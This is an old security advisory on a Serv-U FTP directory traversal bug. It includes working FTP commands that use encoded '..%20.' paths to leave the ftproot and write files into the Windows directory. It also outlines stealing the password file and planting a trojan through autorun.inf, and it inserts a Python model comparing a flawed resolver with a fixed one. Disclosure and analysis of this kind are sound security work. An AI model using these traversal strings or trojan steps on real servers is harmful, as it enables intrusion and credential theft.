Securax-SA-09.serv-u

Posted Dec 5, 2000
Authored by Zoa_Chien | Site securax.org

Securax Security Advisory Securax-SA-09 - The Serv-U FTP server for Windows v 2.4a, 2.5h, and 3.0b (all versions tested) have vulnerabilities stemming from improper handling of hex encoded characters in ftp commands. The server will reveal the full path to the ftproot, allow read/write/execute/list access to any other file on the partition, and allow listing of all hidden files. Fix available here.

tags | exploit, vulnerability
systems | windows
SHA-256 | e6a9f7a08b79162569e6194cad0956887de19d672150ee61fc642ddb1f1d8c63


=====================================================================
Securax-SA-09 Security Advisory
belgian.networking.security Dutch
=====================================================================
Topic: Catsoft serv-U FTP Directory Traversal Vulnerability
Announced: 2000-12-03
Updated: 2000-12-03
tested on: serv-U ftp 2.4a, 2.5h, 3.0 beta, ... (all versions ?)
Not affected: ?
Obsoletes: /
http://www.securax.org/pers/
=====================================================================

THE ENTIRE ADVISORY HAS BEEN BASED UPON TRIAL AND ERROR
RESULTS. THEREFORE WE CANNOT ENSURE THE INFORMATION BELOW IS
100% CORRECT. THIS DOCUMENT IS SUBJECT TO CHANGE WITHOUT PRIOR
NOTICE.
PLEASE, IF YOU HAPPEN TO FIND MORE INFORMATION CONCERNING
THE BUG DISCUSSED IN THIS ADVISORY, SHARE THIS ON BUGTRAQ.
THANK YOU,



I. Background

Let's just dump what I tried (skip this):


Normal use: 1.txt is a file in the homedir.
ftp> get 1.txt
200 PORT Command successful.
150 Opening ASCII mode data connection for 1.txt (7 bytes).
226 Transfer complete.
7 bytes received in 0.00 seconds (7000.00 Kbytes/sec)

Let's see what happens to hex codes: %2E=. %31=1 %20=space ...

ftp> get 1%2etxt
200 PORT Command successful.
550 /1%2etxt: No such file or directory.
ftp>

--> %2e is not decoded

ftp> get 1.%20txt
200 PORT Command successful.
550 /1. txt: No such file or directory.

--> %20 is decoded to a space. (to be compatible with browsers)

ftp> get %201.txt
200 PORT Command successful.
150 Opening ASCII mode data connection for 1.txt (7 bytes).
226 Transfer complete.
7 bytes received in 0.00 seconds (7000.00 Kbytes/sec)

--> hey, look: if the space is at the beginning of the filename,
it is just skipped.

Let's try this on the cd command:

ftp> cd \.a%20\
550 /.a: No such file or directory.

--> space is skipped again...

ftp> cd \a%20a\
550 /a a: No such file or directory.
ftp>

ftp> cd \a%20.\
550 /a: No such file or directory.
ftp>

--> heh? wtf, the %20 removes the .

Let's try to play around with that:

ftp> cd \.%20.
250 Directory changed to /Ftproot

--> Hey, look, the ftp client reveals the ftp dir... that's fun

Let's keep playing

ftp> cd \..%20.
250 Directory changed to /..

--> oh ow, this looks like trouble

ftp> dir
200 PORT Command successful.
150 Opening ASCII mode data connection for /bin/ls.
-rwxrwxrwx 1 user group 1127 Nov 30 22:06 rootdir.txt
...
226 Transfer complete.
1180 bytes received in 0.00 seconds (1180000.00 Kbytes/sec)
ftp>

Ouch, that hurts...

ftp> cd %20..%20%20../winnt\
250 Directory changed to /c:/TOMB/../WINNT
ftp>

You can only use this when you are in your homedir.
You can only use GET ... when you are in your homedir,
so first changing to /winnt and then "get" will not work.

ftp> put autoexec.bat %20..%20%20../winnt/2.bat
200 PORT Command successful.
150 Opening ASCII mode data connection for 2.bat.
226 Transfer complete.
ftp> dir \..%20.\..%20.\winnt\


II. Problem Description

- Serv-U ftp will:
reveal the full path to the ftproot with: cd \.%20.
(even if the "show path relative to home dir" option is on)
Using pwd will work too.

- allow read/write/execute/list access to any other file on
the partition of the ftproot if you have read/write/exec/list
access on your home dir.
Note that the option "inherit subdirs" must be enabled
(otherwise "cd" will not work).
- Serv-U will allow listing of hidden files, even if
"hide hidden files" is on, with "DIR ."

- The exploit also works on serv-U ftp 2.4a... but you might
have to use a different string:
dir %20..%20%20..\*.
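The root cause described above is an ordering problem: the traversal check runs on the raw command argument, while %20 is decoded and trailing spaces/dots are dropped only afterwards, so "..%20." reaches the filesystem as "..". The following Python model is an added example, not Serv-U's code or the advisory's; the FTPROOT value and the one-pass trimming rule (trailing dots, then trailing spaces) are assumptions fitted to the session transcript above, and the hardened resolver shows the fix: decode and trim first, then check the final path against the root.

```python
import posixpath

# Constructed value: the ftproot the advisory's transcript shows (/c:/TOMB).
FTPROOT = "/c:/TOMB"

def windows_trim(component):
    """Model (an assumption fitted to the transcript) of what happens to a path
    component once %20 has become a space: a leading space is skipped
    ("get %201.txt" fetched 1.txt), then trailing dots and then trailing spaces
    are dropped, so "a ." -> "a", ".. ." -> "..", ". ." -> ".", exactly the
    results the "cd" experiments above returned."""
    return component.lstrip(" ").rstrip(".").rstrip(" ")

def decoded_components(user_path):
    """Decode only %20 (the transcript shows %2e is left alone), accept '\\' as
    a separator, and trim each component the way the filesystem layer will."""
    decoded = user_path.replace("%20", " ").replace("\\", "/")
    return [p for p in map(windows_trim, decoded.split("/")) if p]

def vulnerable_resolve(user_path):
    """Flawed order: the traversal check inspects the raw, undecoded components,
    so only a literal '..' is refused. '..%20.' passes, is later trimmed to
    '..', and the path the filesystem really opens leaves FTPROOT.
    Returns None when refused, else that real path."""
    for raw in user_path.replace("\\", "/").split("/"):
        if raw == "..":
            return None
    return posixpath.normpath(posixpath.join(FTPROOT, *decoded_components(user_path)))

def safe_resolve(user_path):
    """Fixed order: decode and trim first, resolve against FTPROOT, and refuse
    anything that does not end up at or below the root. Because the check runs
    on the final path, no encoding of '..' can slip past it."""
    target = posixpath.normpath(posixpath.join(FTPROOT, *decoded_components(user_path)))
    if target != FTPROOT and not target.startswith(FTPROOT + "/"):
        return None
    return target

if __name__ == "__main__":
    for cmd in ("1.txt", "\\..", "\\..%20.", "\\.%20.", "%20..%20%20../winnt\\"):
        print(f"{cmd!r:26} vulnerable={vulnerable_resolve(cmd)!r:18} safe={safe_resolve(cmd)!r}")
```

Running the block prints, for each argument from the transcript, where the flawed resolver lets the request land versus what the hardened one returns (None meaning refused).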

III. Impact:

This is a severe bug and should be patched asap.
If the ftproot is on the C: drive, serv-U.ini can be retrieved,
which contains all passwords of the ftp users
(and can be brute forced with john the ripper).
That way, you could find logins that allow executing... and
you can upload and execute a trojan.

Even if the ftproot is not on the same drive as serv-u.ini,
you can still upload a trojan and make this trojan execute
by using an autorun.inf on e.g. d:\ which points to the trojan.
If the sysadmin uses "My Computer" instead of explorer.exe,
the trojan will be executed.

IV. Solution

Upgrade to version 2.5i, available at:
http://ftpserv-u.deerfield.com/download/

V. Credits

Zoa_Chien (zoachien@securax.org)
Elias (pwd revealing full path)

VI. Source code
none.


---
... And they will all go down together ...

Advertising:
[Zoa_Chien is currently looking for a new job, contact me at
zoachien@securax.org +32/496.45.29.89 for a resume.]



